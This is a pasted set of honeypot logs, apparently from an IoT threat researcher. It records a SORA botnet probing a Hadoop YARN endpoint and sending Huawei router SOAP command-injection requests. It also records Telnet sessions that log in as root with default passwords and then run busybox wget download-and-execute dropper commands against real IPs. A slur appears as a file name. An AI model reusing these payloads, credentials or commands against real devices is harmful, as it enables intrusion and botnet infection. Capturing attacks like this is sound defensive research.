ankit_anubhav

SORA trying hadoop bug lol

Oct 1st, 2018
  1. {
  2. "datas": [
  3. {
  4. "@timestamp": "2018-09-30T02:26:31.000Z",
  5. "data": "POST /ws/v1/cluster/apps/new-application HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nContent-Length: 0\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
  6. },
  7. {
  8. "@timestamp": "2018-09-20T23:03:32.000Z",
  9. "data": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 127.0.0.1:37215\r\nContent-Length: 478\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n\u003c?xml version=\"1.0\" ?\u003e\n \u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\n \u003cs:Body\u003e\u003cu:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\n \u003cNewStatusURL\u003e$(busybox wget -g 209.141.34.89 -l /tmp/scarface -r /bins/sora.mips ;chmod +x /tmp/scarface ;/tmp/scarface huawei)\u003c/NewStatusURL\u003e\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\n\u003c/u:Upgrade\u003e\n \u003c/s:Body\u003e\n \u003c/s:Envelope\u003e"
  10. },
  11. {
  12. "@timestamp": "2018-09-20T18:43:03.000Z",
  13. "data": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 127.0.0.1:37215\r\nContent-Length: 478\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n\u003c?xml version=\"1.0\" ?\u003e\n \u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\n \u003cs:Body\u003e\u003cu:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\n \u003cNewStatusURL\u003e$(busybox wget -g 209.141.34.89 -l /tmp/scarface -r /bins/sora.mips ;chmod +x /tmp/scarface ;/tmp/scarface huawei)\u003c/NewStatusURL\u003e\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\n\u003c/u:Upgrade\u003e\n \u003c/s:Body\u003e\n \u003c/s:Envelope\u003e"
  14. }
  15. ],
  16. "inputs": {
  17. "04351c08ad6d": [
  18. {
  19. "@timestamp": "2018-09-15T04:21:19.755Z",
  20. "eventid": "command.input",
  21. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  22. },
  23. {
  24. "@timestamp": "2018-09-15T04:21:19.663Z",
  25. "eventid": "command.input",
  26. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  27. },
  28. {
  29. "@timestamp": "2018-09-15T04:21:19.301Z",
  30. "eventid": "command.input",
  31. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  32. },
  33. {
  34. "@timestamp": "2018-09-15T04:21:19.202Z",
  35. "eventid": "command.input",
  36. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  37. },
  38. {
  39. "@timestamp": "2018-09-15T04:21:19.112Z",
  40. "eventid": "command.input",
  41. "input": "/bin/busybox SORA"
  42. },
  43. {
  44. "@timestamp": "2018-09-15T04:21:19.011Z",
  45. "eventid": "command.input",
  46. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  47. },
  48. {
  49. "@timestamp": "2018-09-15T04:21:18.902Z",
  50. "eventid": "command.input",
  51. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  52. },
  53. {
  54. "@timestamp": "2018-09-15T04:21:18.892Z",
  55. "eventid": "command.input",
  56. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  57. },
  58. {
  59. "@timestamp": "2018-09-15T04:21:18.890Z",
  60. "eventid": "command.input",
  61. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  62. },
  63. {
  64. "@timestamp": "2018-09-15T04:21:18.883Z",
  65. "eventid": "command.input",
  66. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  67. },
  68. {
  69. "@timestamp": "2018-09-15T04:21:18.881Z",
  70. "eventid": "command.input",
  71. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  72. },
  73. {
  74. "@timestamp": "2018-09-15T04:21:18.873Z",
  75. "eventid": "command.input",
  76. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  77. },
  78. {
  79. "@timestamp": "2018-09-15T04:21:18.871Z",
  80. "eventid": "command.input",
  81. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  82. },
  83. {
  84. "@timestamp": "2018-09-15T04:21:18.863Z",
  85. "eventid": "command.input",
  86. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  87. },
  88. {
  89. "@timestamp": "2018-09-15T04:21:18.861Z",
  90. "eventid": "command.input",
  91. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  92. },
  93. {
  94. "@timestamp": "2018-09-15T04:21:18.859Z",
  95. "eventid": "command.input",
  96. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  97. },
  98. {
  99. "@timestamp": "2018-09-15T04:21:18.858Z",
  100. "eventid": "command.input",
  101. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  102. },
  103. {
  104. "@timestamp": "2018-09-15T04:21:18.848Z",
  105. "eventid": "command.input",
  106. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  107. },
  108. {
  109. "@timestamp": "2018-09-15T04:21:18.846Z",
  110. "eventid": "command.input",
  111. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  112. },
  113. {
  114. "@timestamp": "2018-09-15T04:21:18.845Z",
  115. "eventid": "command.input",
  116. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  117. },
  118. {
  119. "@timestamp": "2018-09-15T04:21:18.837Z",
  120. "eventid": "command.input",
  121. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  122. },
  123. {
  124. "@timestamp": "2018-09-15T04:21:18.834Z",
  125. "eventid": "command.input",
  126. "input": "sh"
  127. },
  128. {
  129. "@timestamp": "2018-09-15T04:21:18.832Z",
  130. "eventid": "command.input",
  131. "input": "shell"
  132. },
  133. {
  134. "@timestamp": "2018-09-15T04:21:18.829Z",
  135. "eventid": "command.input",
  136. "input": "system"
  137. },
  138. {
  139. "@timestamp": "2018-09-15T04:21:18.741Z",
  140. "eventid": "command.input",
  141. "input": "enable"
  142. },
  143. {
  144. "@timestamp": "2018-09-15T04:21:18.652Z",
  145. "eventid": "command.input",
  146. "input": ""
  147. },
  148. {
  149. "@timestamp": "2018-09-15T04:21:17.039Z",
  150. "eventid": "login.success",
  151. "geoip": {
  152. "city_name": "Las Vegas",
  153. "country_name": "United States"
  154. },
  155. "password": "admin",
  156. "username": "root"
  157. }
  158. ],
  159. "11793e449a70": [
  160. {
  161. "@timestamp": "2018-09-15T04:12:40.539Z",
  162. "eventid": "command.input",
  163. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  164. },
  165. {
  166. "@timestamp": "2018-09-15T04:12:40.488Z",
  167. "eventid": "command.input",
  168. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  169. },
  170. {
  171. "@timestamp": "2018-09-15T04:12:40.265Z",
  172. "eventid": "command.input",
  173. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  174. },
  175. {
  176. "@timestamp": "2018-09-15T04:12:39.639Z",
  177. "eventid": "command.input",
  178. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  179. },
  180. {
  181. "@timestamp": "2018-09-15T04:12:39.294Z",
  182. "eventid": "command.input",
  183. "input": "/bin/busybox SORA"
  184. },
  185. {
  186. "@timestamp": "2018-09-15T04:12:39.238Z",
  187. "eventid": "command.input",
  188. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  189. },
  190. {
  191. "@timestamp": "2018-09-15T04:12:38.409Z",
  192. "eventid": "login.success",
  193. "geoip": {
  194. "city_name": "Las Vegas",
  195. "country_name": "United States"
  196. },
  197. "password": "root",
  198. "username": "root"
  199. }
  200. ],
  201. "1fa9946460a3": [
  202. {
  203. "@timestamp": "2018-09-15T04:14:17.149Z",
  204. "eventid": "command.input",
  205. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  206. },
  207. {
  208. "@timestamp": "2018-09-15T04:14:17.103Z",
  209. "eventid": "command.input",
  210. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  211. },
  212. {
  213. "@timestamp": "2018-09-15T04:14:16.925Z",
  214. "eventid": "command.input",
  215. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  216. },
  217. {
  218. "@timestamp": "2018-09-15T04:14:16.875Z",
  219. "eventid": "command.input",
  220. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  221. },
  222. {
  223. "@timestamp": "2018-09-15T04:14:16.829Z",
  224. "eventid": "command.input",
  225. "input": "/bin/busybox SORA"
  226. },
  227. {
  228. "@timestamp": "2018-09-15T04:14:16.778Z",
  229. "eventid": "command.input",
  230. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  231. },
  232. {
  233. "@timestamp": "2018-09-15T04:14:16.696Z",
  234. "eventid": "command.input",
  235. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  236. },
  237. {
  238. "@timestamp": "2018-09-15T04:14:16.691Z",
  239. "eventid": "command.input",
  240. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  241. },
  242. {
  243. "@timestamp": "2018-09-15T04:14:16.689Z",
  244. "eventid": "command.input",
  245. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  246. },
  247. {
  248. "@timestamp": "2018-09-15T04:14:16.687Z",
  249. "eventid": "command.input",
  250. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  251. },
  252. {
  253. "@timestamp": "2018-09-15T04:14:16.685Z",
  254. "eventid": "command.input",
  255. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  256. },
  257. {
  258. "@timestamp": "2018-09-15T04:14:16.683Z",
  259. "eventid": "command.input",
  260. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  261. },
  262. {
  263. "@timestamp": "2018-09-15T04:14:16.681Z",
  264. "eventid": "command.input",
  265. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  266. },
  267. {
  268. "@timestamp": "2018-09-15T04:14:16.679Z",
  269. "eventid": "command.input",
  270. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  271. },
  272. {
  273. "@timestamp": "2018-09-15T04:14:16.677Z",
  274. "eventid": "command.input",
  275. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  276. },
  277. {
  278. "@timestamp": "2018-09-15T04:14:16.675Z",
  279. "eventid": "command.input",
  280. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  281. },
  282. {
  283. "@timestamp": "2018-09-15T04:14:16.673Z",
  284. "eventid": "command.input",
  285. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  286. },
  287. {
  288. "@timestamp": "2018-09-15T04:14:16.670Z",
  289. "eventid": "command.input",
  290. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  291. },
  292. {
  293. "@timestamp": "2018-09-15T04:14:16.668Z",
  294. "eventid": "command.input",
  295. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  296. },
  297. {
  298. "@timestamp": "2018-09-15T04:14:16.666Z",
  299. "eventid": "command.input",
  300. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  301. },
  302. {
  303. "@timestamp": "2018-09-15T04:14:16.664Z",
  304. "eventid": "command.input",
  305. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  306. },
  307. {
  308. "@timestamp": "2018-09-15T04:14:16.662Z",
  309. "eventid": "command.input",
  310. "input": "sh"
  311. },
  312. {
  313. "@timestamp": "2018-09-15T04:14:16.659Z",
  314. "eventid": "command.input",
  315. "input": "shell"
  316. },
  317. {
  318. "@timestamp": "2018-09-15T04:14:16.656Z",
  319. "eventid": "command.input",
  320. "input": "system"
  321. },
  322. {
  323. "@timestamp": "2018-09-15T04:14:16.614Z",
  324. "eventid": "command.input",
  325. "input": "enable"
  326. },
  327. {
  328. "@timestamp": "2018-09-15T04:14:16.570Z",
  329. "eventid": "command.input",
  330. "input": ""
  331. },
  332. {
  333. "@timestamp": "2018-09-15T04:14:16.297Z",
  334. "eventid": "login.success",
  335. "geoip": {
  336. "city_name": "Las Vegas",
  337. "country_name": "United States"
  338. },
  339. "password": "admin",
  340. "username": "root"
  341. }
  342. ],
  343. "202447413b56": [
  344. {
  345. "@timestamp": "2018-09-15T04:12:49.426Z",
  346. "eventid": "command.input",
  347. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  348. },
  349. {
  350. "@timestamp": "2018-09-15T04:12:49.382Z",
  351. "eventid": "command.input",
  352. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  353. },
  354. {
  355. "@timestamp": "2018-09-15T04:12:49.205Z",
  356. "eventid": "command.input",
  357. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  358. },
  359. {
  360. "@timestamp": "2018-09-15T04:12:49.157Z",
  361. "eventid": "command.input",
  362. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  363. },
  364. {
  365. "@timestamp": "2018-09-15T04:12:49.113Z",
  366. "eventid": "command.input",
  367. "input": "/bin/busybox SORA"
  368. },
  369. {
  370. "@timestamp": "2018-09-15T04:12:49.063Z",
  371. "eventid": "command.input",
  372. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  373. },
  374. {
  375. "@timestamp": "2018-09-15T04:12:49.014Z",
  376. "eventid": "command.input",
  377. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  378. },
  379. {
  380. "@timestamp": "2018-09-15T04:12:49.011Z",
  381. "eventid": "command.input",
  382. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  383. },
  384. {
  385. "@timestamp": "2018-09-15T04:12:49.009Z",
  386. "eventid": "command.input",
  387. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  388. },
  389. {
  390. "@timestamp": "2018-09-15T04:12:49.007Z",
  391. "eventid": "command.input",
  392. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  393. },
  394. {
  395. "@timestamp": "2018-09-15T04:12:49.004Z",
  396. "eventid": "command.input",
  397. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  398. },
  399. {
  400. "@timestamp": "2018-09-15T04:12:49.002Z",
  401. "eventid": "command.input",
  402. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  403. },
  404. {
  405. "@timestamp": "2018-09-15T04:12:49.000Z",
  406. "eventid": "command.input",
  407. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  408. },
  409. {
  410. "@timestamp": "2018-09-15T04:12:48.998Z",
  411. "eventid": "command.input",
  412. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  413. },
  414. {
  415. "@timestamp": "2018-09-15T04:12:48.996Z",
  416. "eventid": "command.input",
  417. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  418. },
  419. {
  420. "@timestamp": "2018-09-15T04:12:48.994Z",
  421. "eventid": "command.input",
  422. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  423. },
  424. {
  425. "@timestamp": "2018-09-15T04:12:48.992Z",
  426. "eventid": "command.input",
  427. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  428. },
  429. {
  430. "@timestamp": "2018-09-15T04:12:48.990Z",
  431. "eventid": "command.input",
  432. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  433. },
  434. {
  435. "@timestamp": "2018-09-15T04:12:48.988Z",
  436. "eventid": "command.input",
  437. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  438. },
  439. {
  440. "@timestamp": "2018-09-15T04:12:48.986Z",
  441. "eventid": "command.input",
  442. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  443. },
  444. {
  445. "@timestamp": "2018-09-15T04:12:48.984Z",
  446. "eventid": "command.input",
  447. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  448. },
  449. {
  450. "@timestamp": "2018-09-15T04:12:48.981Z",
  451. "eventid": "command.input",
  452. "input": "sh"
  453. },
  454. {
  455. "@timestamp": "2018-09-15T04:12:48.979Z",
  456. "eventid": "command.input",
  457. "input": "shell"
  458. },
  459. {
  460. "@timestamp": "2018-09-15T04:12:48.976Z",
  461. "eventid": "command.input",
  462. "input": "system"
  463. },
  464. {
  465. "@timestamp": "2018-09-15T04:12:48.935Z",
  466. "eventid": "command.input",
  467. "input": "enable"
  468. },
  469. {
  470. "@timestamp": "2018-09-15T04:12:48.892Z",
  471. "eventid": "command.input",
  472. "input": ""
  473. },
  474. {
  475. "@timestamp": "2018-09-15T04:12:48.615Z",
  476. "eventid": "login.success",
  477. "geoip": {
  478. "city_name": "Las Vegas",
  479. "country_name": "United States"
  480. },
  481. "password": "default",
  482. "username": "root"
  483. }
  484. ],
  485. "25b69393953d": [
  486. {
  487. "@timestamp": "2018-09-15T04:17:54.442Z",
  488. "eventid": "command.input",
  489. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  490. },
  491. {
  492. "@timestamp": "2018-09-15T04:17:54.351Z",
  493. "eventid": "command.input",
  494. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  495. },
  496. {
  497. "@timestamp": "2018-09-15T04:17:53.986Z",
  498. "eventid": "command.input",
  499. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  500. },
  501. {
  502. "@timestamp": "2018-09-15T04:17:53.884Z",
  503. "eventid": "command.input",
  504. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  505. },
  506. {
  507. "@timestamp": "2018-09-15T04:17:53.740Z",
  508. "eventid": "command.input",
  509. "input": "/bin/busybox SORA"
  510. },
  511. {
  512. "@timestamp": "2018-09-15T04:17:53.652Z",
  513. "eventid": "command.input",
  514. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  515. },
  516. {
  517. "@timestamp": "2018-09-15T04:17:53.546Z",
  518. "eventid": "command.input",
  519. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  520. },
  521. {
  522. "@timestamp": "2018-09-15T04:17:53.538Z",
  523. "eventid": "command.input",
  524. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  525. },
  526. {
  527. "@timestamp": "2018-09-15T04:17:53.536Z",
  528. "eventid": "command.input",
  529. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  530. },
  531. {
  532. "@timestamp": "2018-09-15T04:17:53.534Z",
  533. "eventid": "command.input",
  534. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  535. },
  536. {
  537. "@timestamp": "2018-09-15T04:17:53.527Z",
  538. "eventid": "command.input",
  539. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  540. },
  541. {
  542. "@timestamp": "2018-09-15T04:17:53.526Z",
  543. "eventid": "command.input",
  544. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  545. },
  546. {
  547. "@timestamp": "2018-09-15T04:17:53.518Z",
  548. "eventid": "command.input",
  549. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  550. },
  551. {
  552. "@timestamp": "2018-09-15T04:17:53.517Z",
  553. "eventid": "command.input",
  554. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  555. },
  556. {
  557. "@timestamp": "2018-09-15T04:17:53.515Z",
  558. "eventid": "command.input",
  559. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  560. },
  561. {
  562. "@timestamp": "2018-09-15T04:17:53.508Z",
  563. "eventid": "command.input",
  564. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  565. },
  566. {
  567. "@timestamp": "2018-09-15T04:17:53.506Z",
  568. "eventid": "command.input",
  569. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  570. },
  571. {
  572. "@timestamp": "2018-09-15T04:17:53.497Z",
  573. "eventid": "command.input",
  574. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  575. },
  576. {
  577. "@timestamp": "2018-09-15T04:17:53.496Z",
  578. "eventid": "command.input",
  579. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  580. },
  581. {
  582. "@timestamp": "2018-09-15T04:17:53.489Z",
  583. "eventid": "command.input",
  584. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  585. },
  586. {
  587. "@timestamp": "2018-09-15T04:17:53.487Z",
  588. "eventid": "command.input",
  589. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  590. },
  591. {
  592. "@timestamp": "2018-09-15T04:17:53.486Z",
  593. "eventid": "command.input",
  594. "input": "sh"
  595. },
  596. {
  597. "@timestamp": "2018-09-15T04:17:53.478Z",
  598. "eventid": "command.input",
  599. "input": "shell"
  600. },
  601. {
  602. "@timestamp": "2018-09-15T04:17:53.477Z",
  603. "eventid": "command.input",
  604. "input": "system"
  605. },
  606. {
  607. "@timestamp": "2018-09-15T04:17:53.475Z",
  608. "eventid": "command.input",
  609. "input": "enable"
  610. },
  611. {
  612. "@timestamp": "2018-09-15T04:17:52.676Z",
  613. "eventid": "command.input",
  614. "input": ""
  615. },
  616. {
  617. "@timestamp": "2018-09-15T04:17:51.781Z",
  618. "eventid": "login.success",
  619. "geoip": {
  620. "city_name": "Las Vegas",
  621. "country_name": "United States"
  622. },
  623. "password": "vizxv",
  624. "username": "root"
  625. }
  626. ],
  627. "2b113c9c5c08": [
  628. {
  629. "@timestamp": "2018-09-15T04:12:46.879Z",
  630. "eventid": "command.input",
  631. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  632. },
  633. {
  634. "@timestamp": "2018-09-15T04:12:46.787Z",
  635. "eventid": "command.input",
  636. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  637. },
  638. {
  639. "@timestamp": "2018-09-15T04:12:46.425Z",
  640. "eventid": "command.input",
  641. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  642. },
  643. {
  644. "@timestamp": "2018-09-15T04:12:46.325Z",
  645. "eventid": "command.input",
  646. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  647. },
  648. {
  649. "@timestamp": "2018-09-15T04:12:46.173Z",
  650. "eventid": "command.input",
  651. "input": "/bin/busybox SORA"
  652. },
  653. {
  654. "@timestamp": "2018-09-15T04:12:46.088Z",
  655. "eventid": "command.input",
  656. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  657. },
  658. {
  659. "@timestamp": "2018-09-15T04:12:45.980Z",
  660. "eventid": "command.input",
  661. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  662. },
  663. {
  664. "@timestamp": "2018-09-15T04:12:45.977Z",
  665. "eventid": "command.input",
  666. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  667. },
  668. {
  669. "@timestamp": "2018-09-15T04:12:45.969Z",
  670. "eventid": "command.input",
  671. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  672. },
  673. {
  674. "@timestamp": "2018-09-15T04:12:45.967Z",
  675. "eventid": "command.input",
  676. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  677. },
  678. {
  679. "@timestamp": "2018-09-15T04:12:45.959Z",
  680. "eventid": "command.input",
  681. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  682. },
  683. {
  684. "@timestamp": "2018-09-15T04:12:45.958Z",
  685. "eventid": "command.input",
  686. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  687. },
  688. {
  689. "@timestamp": "2018-09-15T04:12:45.950Z",
  690. "eventid": "command.input",
  691. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  692. },
  693. {
  694. "@timestamp": "2018-09-15T04:12:45.948Z",
  695. "eventid": "command.input",
  696. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  697. },
  698. {
  699. "@timestamp": "2018-09-15T04:12:45.940Z",
  700. "eventid": "command.input",
  701. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  702. },
  703. {
  704. "@timestamp": "2018-09-15T04:12:45.939Z",
  705. "eventid": "command.input",
  706. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  707. },
  708. {
  709. "@timestamp": "2018-09-15T04:12:45.937Z",
  710. "eventid": "command.input",
  711. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  712. },
  713. {
  714. "@timestamp": "2018-09-15T04:12:45.930Z",
  715. "eventid": "command.input",
  716. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  717. },
  718. {
  719. "@timestamp": "2018-09-15T04:12:45.928Z",
  720. "eventid": "command.input",
  721. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  722. },
  723. {
  724. "@timestamp": "2018-09-15T04:12:45.920Z",
  725. "eventid": "command.input",
  726. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  727. },
  728. {
  729. "@timestamp": "2018-09-15T04:12:45.918Z",
  730. "eventid": "command.input",
  731. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  732. },
  733. {
  734. "@timestamp": "2018-09-15T04:12:45.917Z",
  735. "eventid": "command.input",
  736. "input": "sh"
  737. },
  738. {
  739. "@timestamp": "2018-09-15T04:12:45.909Z",
  740. "eventid": "command.input",
  741. "input": "shell"
  742. },
  743. {
  744. "@timestamp": "2018-09-15T04:12:45.901Z",
  745. "eventid": "command.input",
  746. "input": "system"
  747. },
  748. {
  749. "@timestamp": "2018-09-15T04:12:45.899Z",
  750. "eventid": "command.input",
  751. "input": "enable"
  752. },
  753. {
  754. "@timestamp": "2018-09-15T04:12:45.071Z",
  755. "eventid": "command.input",
  756. "input": ""
  757. },
  758. {
  759. "@timestamp": "2018-09-15T04:12:43.528Z",
  760. "eventid": "login.success",
  761. "geoip": {
  762. "city_name": "Las Vegas",
  763. "country_name": "United States"
  764. },
  765. "password": "t0talc0ntr0l4!",
  766. "username": "root"
  767. }
  768. ],
  769. "335fbc5279c3": [
  770. {
  771. "@timestamp": "2018-09-15T04:13:04.193Z",
  772. "eventid": "command.input",
  773. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  774. },
  775. {
  776. "@timestamp": "2018-09-15T04:13:04.148Z",
  777. "eventid": "command.input",
  778. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  779. },
  780. {
  781. "@timestamp": "2018-09-15T04:13:03.965Z",
  782. "eventid": "command.input",
  783. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  784. },
  785. {
  786. "@timestamp": "2018-09-15T04:13:03.478Z",
  787. "eventid": "command.input",
  788. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  789. },
  790. {
